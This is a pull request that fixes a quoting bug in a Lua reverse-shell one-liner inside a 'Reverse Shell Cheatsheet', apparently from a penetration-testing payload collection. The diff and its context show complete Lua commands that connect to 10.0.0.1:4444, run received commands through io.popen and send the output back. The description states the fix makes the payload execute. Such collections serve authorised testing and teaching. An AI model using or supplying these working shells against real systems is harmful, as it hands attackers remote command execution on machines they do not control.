### PR TITLE
Fix lua reverse shell quote issue

### DIFF
--- a/Methodology and Resources/Reverse Shell Cheatsheet.md
+++ b/Methodology and Resources/Reverse Shell Cheatsheet.md
@@ -203,7 +203,7 @@ lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','424
 Windows and Linux
 
 ```powershell
-lua5.1 -e 'local host, port = "10.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'
+lua5.1 -e 'local host, port = "10.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, "r") local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'
 ```
 
 ### NodeJS


### PR DESCRIPTION
The single quotes used in `io.popen` prevent the one-liner from being executed.
This change should fix that :)